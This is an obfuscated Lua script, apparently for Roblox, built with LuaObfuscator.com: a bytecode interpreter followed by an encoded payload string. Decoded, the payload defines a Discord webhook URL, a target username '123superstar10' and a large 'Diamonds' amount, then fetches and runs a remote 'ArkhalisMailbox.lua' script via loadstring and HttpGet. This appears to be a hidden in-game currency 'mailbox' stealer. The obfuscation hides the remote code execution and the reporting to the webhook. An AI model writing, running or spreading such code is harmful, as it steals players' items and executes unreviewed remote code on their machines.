--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=0 -0 ;local v32;while true do if (v31==(2 -1)) then return v32;end if (v31==((931 -(857 + 74)) -0)) then v32=v1(v16,v19,v19);v19=v19 + (2 -1) ;v31=620 -(555 + 64) ;end end end v23=nil;function v23()local v33,v34=v1(v16,v19,v19 + (570 -(367 + 201)) );v19=v19 + (929 -(214 + 713)) ;return (v34 * (65 + 191)) + v33 ;end v18=3;end if (v18==4) then function v25()local v35=0 + 0 ;local v36;local v37;local v38;local v39;local v40;local v41;while true do if ((879 -(282 + 595))==v35) then v40=v21(v37,1658 -(1523 + 114) ,28 + 3 );v41=((v21(v37,45 -13 )==(1066 -(68 + 997))) and  -(2 -1)) or (1271 -((494 -268) + 1044)) ;v35=12 -(2 + 7) ;end if (v35==(118 -(32 + 85))) then v38=1;v39=(v21(v37,1 + 0 ,(8 -3) + 15 ) * (((952 + 7) -(892 + 65))^(75 -43))) + v36 ;v35=3 -(792 -(368 + 423)) ;end if (v35==(4 -1)) then if (v40==(350 -((273 -186) + 263))) then if (v39==(180 -(67 + 113))) then return v41 * (0 + 0) ;else local v97=0 -0 ;while true do if (v97==0) then v40=1 + 0 ;v38=0 -0 ;break;end end end elseif (v40==(2999 -(802 + 150))) then return ((v39==(0 -0)) and (v41 * (((19 -(10 + 8)) -0)/(0 + 0)))) or (v41 * NaN) ;end return v8(v41,v40-((7770 -5750) -(915 + 82)) ) * (v38 + (v39/(((447 -(416 + 26)) -(9 -6))^(31 + 21)))) ;end if (v35==(0 -0)) then v36=v24();v37=v24();v35=1188 -(1069 + 118) ;end end end v26=nil;function v26(v42)local v43=0 + 0 ;local v44;local v45;while true do if (v43==(0 -(0 + 0))) then v44=nil;if  not v42 then local v93=0;while true do if (v93==(438 -((529 -384) + 293))) then v42=v24();if (v42==(430 -((156 -112) + 386))) then return "";end break;end end end v43=1487 -(998 + 488) ;end if (((860 -(814 + 45)) + (0 -0))==v43) then v44=v3(v16,v19,(v19 + v42) -1 );v19=v19 + v42 ;v43=2 + 0 ;end if (v43==(774 -(201 + 571))) then v45={};for v75=1139 -(116 + 56 + 966) , #v44 do v45[v75]=v2(v1(v3(v44,v75,v75)));end v43=12 -9 ;end if (v43==(2 + 1)) then return v6(v45);end end end v18=5;end if (v18==6) then v29=nil;function v29()local v46=700 -(271 + 429) ;local v47;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v46==(0 + 0)) then v47=0;v48=nil;v46=1;end if (v46~=(5 -3)) then else v51=nil;v52=nil;v46=3;end if (v46==(3 + 0)) then v53=nil;while true do local v77=0;while true do if (v77==(0 + 0)) then if (v47==3) then local v102=1500 -(1408 + 92) ;while true do if (v102==(0 + 0)) then for v119=1,v24() do v49[v119-1 ]=v29();end return v51;end end end if ((1086 -(461 + 625))==v47) then local v103=1288 -(993 + 295) ;while true do if (v103~=0) then else v48={};v49={};v103=1 + 0 ;end if ((1172 -(418 + 753))==v103) then v50={};v47=1662 -(1477 + 184) ;break;end end end v77=1 -0 ;end if (v77~=1) then else if (v47==(1 + 1)) then local v104=0 + 0 ;while true do if (v104==1) then for v121=1 + 0 ,v24() do local v122=0;local v123;local v124;while true do if (v122==(1 + 0)) then while true do if (v123~=(529 -(406 + 123))) then else v124=v22();if (v21(v124,1770 -(1749 + 20) ,1 + 0 )==(856 -(564 + 292))) then local v193=1322 -(1249 + 73) ;local v194;local v195;local v196;local v197;local v198;local v199;while true do if (v193==1) then v196=nil;v197=nil;v193=2;end if (v193~=0) then else v194=0 + 0 ;v195=nil;v193=1;end if (v193==(8 -5)) then while true do if (v194~=(1146 -(466 + 679))) then else v197=nil;v198=nil;v194=2 + 0 ;end if (v194==(476 -(41 + 435))) then local v204=1001 -(938 + 63) ;while true do if (v204==0) then v195=0;v196=nil;v204=1 + 0 ;end if (v204==(2 -1)) then v194=1 + 0 ;break;end end end if (2==v194) then v199=nil;while true do if (v195==(1613 -(1565 + 48))) then local v205=0 -0 ;local v206;while true do if (v205~=(1138 -(782 + 356))) then else v206=1900 -(106 + 1794) ;while true do if ((1 + 0)~=v206) then else v195=1 + 0 ;break;end if (v206==0) then local v218=0 -0 ;while true do if (v218==(2 -1)) then v206=1;break;end if (v218==(1875 -(157 + 1718))) then v196=0 + 0 ;v197=nil;v218=3 -2 ;end end end end break;end end end if (v195~=(6 -4)) then else while true do if (v196==(1020 -(697 + 321))) then local v209=0 -0 ;local v210;while true do if (0==v209) then v210=0;while true do if (v210==1) then v196=5 -2 ;break;end if (v210==(114 -(4 + 110))) then local v219=584 -(57 + 527) ;local v220;while true do if (v219==(1427 -(41 + 1386))) then v220=0;while true do if (v220==(0 + 0)) then local v225=0;while true do if (v225~=(104 -(17 + 86))) then else v220=2 -1 ;break;end if (v225~=0) then else if (v21(v198,1,1228 -(322 + 905) )==(612 -(602 + 9))) then v199[1191 -(449 + 740) ]=v53[v199[2 + 0 ]];end if (v21(v198,3 -1 ,2)==1) then v199[8 -5 ]=v53[v199[169 -(122 + 44) ]];end v225=1;end end end if (v220==1) then v210=1 -0 ;break;end end break;end end end end break;end end end if (v196==0) then local v211=0 -0 ;while true do if ((1 + 0)==v211) then v196=1 + 0 ;break;end if (v211==(0 -0)) then v197=v21(v124,2,1 + 2 );v198=v21(v124,69 -(30 + 35) ,5 + 1 );v211=1258 -(1043 + 214) ;end end end if (v196~=(11 -8)) then else if (v21(v198,3 + 0 ,1215 -(323 + 889) )~=(2 -1)) then else v199[1209 -(902 + 303) ]=v53[v199[584 -(361 + 219) ]];end v48[v121]=v199;break;end if (v196==(321 -(53 + 267))) then local v213=0 + 0 ;local v214;while true do if (v213~=(413 -(15 + 398))) then else v214=982 -(18 + 964) ;while true do if (v214==1) then v196=7 -5 ;break;end if (v214==(0 + 0)) then local v221=0;while true do if (v221==(1 + 0)) then v214=684 -(483 + 200) ;break;end if (v221==(850 -(20 + 830))) then v199={v23(),v23(),nil,nil};if (v197==(0 -0)) then local v222=126 -(116 + 10) ;local v223;local v224;while true do if (v222==1) then while true do if (v223~=(765 -(468 + 297))) then else v224=0;while true do if ((0 + 0)==v224) then v199[3]=v23();v199[566 -(334 + 228) ]=v23();break;end end break;end end break;end if (v222~=(0 -0)) then else v223=738 -(542 + 196) ;v224=nil;v222=1;end end elseif (v197==1) then v199[3]=v24();elseif (v197==(3 -1)) then v199[1 + 2 ]=v24() -((2 + 0)^16) ;elseif (v197~=3) then else local v232=0 + 0 ;local v233;local v234;while true do if (v232==(0 -0)) then v233=0 -0 ;v234=nil;v232=1552 -(1126 + 425) ;end if (v232==(406 -(118 + 287))) then while true do if (v233==(0 -0)) then v234=0;while true do if (v234==(1121 -(118 + 1003))) then v199[7 -4 ]=v24() -(2^(46 -30)) ;v199[381 -(142 + 235) ]=v23();break;end end break;end end break;end end end v221=1 + 0 ;end end end end break;end end end end break;end if (v195==(2 -1)) then local v207=0 -0 ;while true do if (v207~=(0 + 0)) then else local v215=0 + 0 ;while true do if (v215==0) then v198=nil;v199=nil;v215=1;end if (v215==(978 -(553 + 424))) then v207=1;break;end end end if (v207~=1) then else v195=2;break;end end end end break;end end break;end if (v193==2) then v198=nil;v199=nil;v193=3;end end end break;end end break;end if (v122==(0 + 0)) then v123=163 -(92 + 71) ;v124=nil;v122=1 + 0 ;end end end v47=3;break;end if (v104~=(0 -0)) then else for v125=766 -(574 + 191) ,v52 do local v126=0 + 0 ;local v127;local v128;local v129;local v130;while true do if (v126==2) then while true do if (v127~=(0 + 0)) then else local v192=0 + 0 ;while true do if (v192==(0 + 0)) then v128=0 + 0 ;v129=nil;v192=1 + 0 ;end if (v192==(127 -(55 + 71))) then v127=2 -1 ;break;end end end if (1==v127) then v130=nil;while true do if (v128~=(2 -1)) then else if (v129==1) then v130=v22()~=(0 -0) ;elseif (v129==(1792 -(573 + 1217))) then v130=v25();elseif (v129~=3) then else v130=v26();end v53[v125]=v130;break;end if (v128==(0 -0)) then local v201=0 + 0 ;local v202;local v203;while true do if (v201==1) then while true do if (v202==(0 + 0)) then v203=0 -0 ;while true do if (v203~=(753 -(239 + 514))) then else local v208=0 + 0 ;while true do if (v208==(1329 -(797 + 532))) then v129=v22();v130=nil;v208=1;end if (v208==(1 + 0)) then v203=1 + 0 ;break;end end end if ((1 + 0)==v203) then v128=1;break;end end break;end end break;end if (v201~=(0 -0)) then else v202=0 -0 ;v203=nil;v201=1;end end end end break;end end break;end if (v126==(806 -(118 + 688))) then local v188=48 -(25 + 23) ;while true do if (v188~=(1 + 0)) then else v126=1203 -(373 + 829) ;break;end if (0==v188) then v127=0;v128=nil;v188=732 -(476 + 255) ;end end end if ((1131 -(369 + 761))~=v126) then else local v189=0;while true do if (v189==(733 -(16 + 716))) then v126=2 + 0 ;break;end if (v189==(97 -(11 + 86))) then v129=nil;v130=nil;v189=2 -1 ;end end end end end v51[288 -(175 + 110) ]=v22();v104=1 -0 ;end end end if (v47==(1 -0)) then local v105=1796 -(503 + 1293) ;local v106;while true do if (v105==(238 -(64 + 174))) then v106=0 + 0 ;while true do if (v106~=(0 + 0)) then else v51={v48,v49,nil,v50};v52=v24();v106=217 -(42 + 174) ;end if (v106~=(1 + 0)) then else v53={};v47=2 + 0 ;break;end end break;end end end break;end end end break;end if (v46==(1 + 0)) then v49=nil;v50=nil;v46=1506 -(363 + 1141) ;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v54)if (v1(v54,2)==79) then v20=v0(v3(v54,1,1));return "";else local v69=v2(v0(v54,16));if v20 then local v78=v5(v69,v20);v20=nil;return v78;else return v69;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v55,v56,v57,v58=v1(v16,v19,v19 + (736 -(172 + 539 + 22)) );v19=v19 + (15 -11) ;return (v58 * 16777216) + (v57 * (66395 -(240 + 619))) + (v56 * 256) + v55 ;end v25=nil;v18=4;end if (v18==7) then function v30(v59,v60,v61)local v62=0;local v63;local v64;local v65;while true do if (v62==0) then v63=v59[1];v64=v59[2];v62=1;end if (v62==1) then v65=v59[3];return function(...)local v79=v63;local v80=v64;local v81=v65;local v82=v28;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v94=0,v87 do if (v94>=v81) then v85[v94-v81 ]=v86[v94 + 1 ];else v89[v94]=v86[v94 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=5) then if (v92<=2) then if (v92<=0) then v89[v91[2]]=v91[3];elseif (v92>1) then v89[v91[2]]();else local v131=v91[2];local v132=v89[v91[3]];v89[v131 + 1 ]=v132;v89[v131]=v132[v91[4]];end elseif (v92<=3) then v89[v91[2]]=v61[v91[3]];elseif (v92==4) then local v136=0;local v137;while true do if (v136==0) then v137=v91[2];v89[v137]=v89[v137](v13(v89,v137 + 1 ,v84));break;end end elseif (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v92<=8) then if (v92<=6) then local v111=0;while true do if (3==v111) then v83=v91[3];break;end if (v111==1) then v83=v83 + 1 ;v91=v79[v83];v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v111=2;end if (v111==2) then v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v111=3;end if (v111==0) then v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v61[v91[3]];v111=1;end end elseif (v92>7) then v83=v91[3];else local v139=v91[2];local v140,v141=v82(v89[v139](v13(v89,v139 + 1 ,v91[3])));v84=(v141 + v139) -1 ;local v142=0;for v157=v139,v84 do v142=v142 + 1 ;v89[v157]=v140[v142];end end elseif (v92<=9) then local v112=0;local v113;local v114;local v115;local v116;local v117;while true do if (v112==6) then v84=(v115 + v117) -1 ;v113=0;for v185=v117,v84 do v113=v113 + 1 ;v89[v185]=v114[v113];end v83=v83 + 1 ;v112=7;end if (v112==9) then v83=v91[3];break;end if (v112==4) then v89[v117]=v116[v91[4]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v112=5;end if (v112==1) then v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v61[v91[3]];v112=2;end if (v112==8) then v91=v79[v83];v89[v91[2]]();v83=v83 + 1 ;v91=v79[v83];v112=9;end if (5==v112) then v83=v83 + 1 ;v91=v79[v83];v117=v91[2];v114,v115=v82(v89[v117](v13(v89,v117 + 1 ,v91[3])));v112=6;end if (v112==7) then v91=v79[v83];v117=v91[2];v89[v117]=v89[v117](v13(v89,v117 + 1 ,v84));v83=v83 + 1 ;v112=8;end if (v112==3) then v91=v79[v83];v117=v91[2];v116=v89[v91[3]];v89[v117 + 1 ]=v116;v112=4;end if (v112==2) then v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v61[v91[3]];v83=v83 + 1 ;v112=3;end if (0==v112) then v113=nil;v114,v115=nil;v116=nil;v117=nil;v112=1;end end elseif (v92>10) then v89[v91[2]][v91[3]]=v91[4];else do return;end end v83=v83 + 1 ;end end;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v66,v67,v68)if v68 then local v70=(v66/((2 -0)^(v67-(1 + 0))))%((1746 -(1344 + 400))^(((v68-(406 -((310 -55) + 100 + 50))) -(v67-(1 + 0))) + 1 + 0)) ;return v70-(v70%((2 + 2) -3)) ;else local v71=2^(v67-(3 -2)) ;return (((v66%(v71 + v71))>=v71) and (1740 -(404 + 1335))) or (406 -(183 + 223)) ;end end v22=nil;v18=2;end end end v15("LOL!0D3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313039353631322O3533373637322O3036352F49337870696545425F5275725961634D6A4876714E2O566D5866566C70416633472D3563486658676B5A554157417856386F536F676C346B325A712D654B3355437A364D030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403313O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F41726B68616C69734D61696C626F782E6C756103083O00557365726E616D65030E3O00313233737570657273746172313003083O004469616D6F6E6473024O002O841E4100163O00124O00013O0026053O000D000100020004083O000D0001001203000100033O00300900010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000200046O00013O00024O00010001000100044O001500010026053O0001000100010004083O00010001001203000100033O0030060001000A000B00122O000100033O00302O0001000C000D00124O00023O00044O000100012O000A3O00017O00",v9(),...);end